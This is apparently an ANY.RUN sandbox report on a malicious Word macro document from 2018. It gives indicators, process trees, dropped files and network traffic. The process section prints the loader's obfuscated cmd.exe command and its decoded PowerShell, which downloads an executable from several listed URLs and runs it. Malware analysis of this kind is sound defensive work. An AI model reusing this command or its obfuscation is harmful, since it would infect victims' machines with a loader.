analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0364631961.doc

Full analysis: https://app.any.run/tasks/8c3bdfd4-3aab-4be3-8e46-fc53ce269a0b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 15:31:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 13:15:00 2018, Last Saved Time/Date: Tue Dec 18 13:15:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 35, Security: 0
MD5:

37FCEF0DDCBED641DF9A96668F864784

SHA1:

C0D38337932243843C46D2A58CCB6AA2C2AF94E4

SHA256:

1B5942D6F32DC2ED91C4DE5A324C9F88908BE16D66E25C8D6F06B49261B9942C

SSDEEP:

1536:nT81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadaqCiswe3+a9:nT8GhDS0o9zTGOZD6EbzCdqis

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2816)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2608)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2816)
    • Application was dropped or rewritten from another process

      • 134.exe (PID: 2800)
      • 134.exe (PID: 3596)
      • archivesymbol.exe (PID: 2252)
      • archivesymbol.exe (PID: 3024)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2544)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1028)
    • Creates files in the user directory

      • powershell.exe (PID: 2544)
    • Starts itself from another location

      • 134.exe (PID: 2800)
    • Executable content was dropped or overwritten

      • 134.exe (PID: 2800)
      • powershell.exe (PID: 2544)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2816)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 13:15:00
ModifyDate: 2018:12:18 13:15:00
Pages: 1
Words: 5
Characters: 35
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 39
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
8
Malicious processes
3
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 134.exe no specs 134.exe archivesymbol.exe no specs archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2816"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0364631961.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1028c:\ThWspUnzCiz\izqJsYzFSN\uqrqrBRZcbCC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set 3Uqu=;'NFd'=VRh$}}{hctac}};kaerb;'HIw'=ZYA$;CdJ$ metI-ekovnI{ )00008 eg- htgnel.)CdJ$ metI-teG(( fI;'Xbw'=OfC$;)CdJ$ ,pVf$(eliFdaolnwoD.APz${yrt{)vdw$ ni pVf$(hcaerof;'exe.'+QvL$+'\'+pmet:vne$=CdJ$;'PIF'=DOJ$;'431' = QvL$;'Wvw'=bJE$;)'@'(tilpS.'nC/ku.oc.nosdrahcirnagrom.www//:ptth@GKHabg_iybyVx3h/li.gro.seulb.www//:ptth@2fp0_62Fgq5/ue.senuajsoedivsel.txen.www//:ptth@Rwaf_KBWz/moc.ahnagebas.www//:ptth@Km1ANQiB_YcNEUo2/moc.kcolfatner.www//:ptth'=vdw$;tneilCbeW.teN tcejbo-wen=APz$;'aob'=vXM$ llehsrewop&&for /L %c in (498;-1;0)do set g7eD=!g7eD!!3Uqu:~%c,1!&&if %c==0 call %g7eD:~-499%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2608CmD /V:O/C"set 3Uqu=;'NFd'=VRh$}}{hctac}};kaerb;'HIw'=ZYA$;CdJ$ metI-ekovnI{ )00008 eg- htgnel.)CdJ$ metI-teG(( fI;'Xbw'=OfC$;)CdJ$ ,pVf$(eliFdaolnwoD.APz${yrt{)vdw$ ni pVf$(hcaerof;'exe.'+QvL$+'\'+pmet:vne$=CdJ$;'PIF'=DOJ$;'431' = QvL$;'Wvw'=bJE$;)'@'(tilpS.'nC/ku.oc.nosdrahcirnagrom.www//:ptth@GKHabg_iybyVx3h/li.gro.seulb.www//:ptth@2fp0_62Fgq5/ue.senuajsoedivsel.txen.www//:ptth@Rwaf_KBWz/moc.ahnagebas.www//:ptth@Km1ANQiB_YcNEUo2/moc.kcolfatner.www//:ptth'=vdw$;tneilCbeW.teN tcejbo-wen=APz$;'aob'=vXM$ llehsrewop&&for /L %c in (498;-1;0)do set g7eD=!g7eD!!3Uqu:~%c,1!&&if %c==0 call %g7eD:~-499%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2544powershell $MXv='boa';$zPA=new-object Net.WebClient;$wdv='http://www.rentaflock.com/2oUENcY_BiQNA1mK@http://www.sabeganha.com/zWBK_fawR@http://www.next.lesvideosjaunes.eu/5qgF26_0pf2@http://www.blues.org.il/h3xVybyi_gbaHKG@http://www.morganrichardson.co.uk/Cn'.Split('@');$EJb='wvW';$LvQ = '134';$JOD='FIP';$JdC=$env:temp+'\'+$LvQ+'.exe';foreach($fVp in $wdv){try{$zPA.DownloadFile($fVp, $JdC);$CfO='wbX';If ((Get-Item $JdC).length -ge 80000) {Invoke-Item $JdC;$AYZ='wIH';break;}}catch{}}$hRV='dFN';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3596"C:\Users\admin\AppData\Local\Temp\134.exe" C:\Users\admin\AppData\Local\Temp\134.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2800"C:\Users\admin\AppData\Local\Temp\134.exe"C:\Users\admin\AppData\Local\Temp\134.exe
134.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2252"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe134.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3024"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 777
Read events
1 296
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9243.tmp.cvr
MD5:
SHA256:
2816WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7A9207E.wmf
MD5:
SHA256:
2816WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93FD213C.wmf
MD5:
SHA256:
2544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q1AX9PG94HRH2VWOA770.temp
MD5:
SHA256:
2816WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82D6DA67.wmfwmf
MD5:FD9C09C1CBBA5C0C4608E5C9E2445EBB
SHA256:2986C2F8C3B2D33CF09BB0FD8B00D31C44817F8B2365DD6D0F1240B602203C1F
2544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2816WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:97134130F5D402DEF1A4F4D6C8F007FA
SHA256:5CD87DA05B66B14EE81C18E40F0A083053B878A7F3D82D5CF3212B25AF266A26
2816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$64631961.docpgc
MD5:F32B7B284A8A39A5BA028A1654EB7EC4
SHA256:5FD6CB68FA145524C96A502B200E0B9F674955C6670B98E58A918869D0F65685
2544powershell.exeC:\Users\admin\AppData\Local\Temp\134.exeexecutable
MD5:059023098F79F8401498C6015991F77A
SHA256:AE797BE3820A34281F860E9F8AE85743DD62F3DED25BB5DFF1681153EA1F535F
2800134.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:059023098F79F8401498C6015991F77A
SHA256:AE797BE3820A34281F860E9F8AE85743DD62F3DED25BB5DFF1681153EA1F535F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2544
powershell.exe
GET
200
192.185.199.10:80
http://www.rentaflock.com/2oUENcY_BiQNA1mK/
US
executable
124 Kb
suspicious
2544
powershell.exe
GET
301
192.185.199.10:80
http://www.rentaflock.com/2oUENcY_BiQNA1mK
US
html
319 b
suspicious
3024
archivesymbol.exe
GET
217.173.64.242:443
http://217.173.64.242:443/
RU
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2544
powershell.exe
192.185.199.10:80
www.rentaflock.com
CyrusOne LLC
US
suspicious
3024
archivesymbol.exe
217.173.64.242:443
OOO WestCall Ltd.
RU
suspicious

DNS requests

Domain
IP
Reputation
www.rentaflock.com
  • 192.185.199.10
suspicious

Threats

PID
Process
Class
Message
2544
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2544
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2544
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info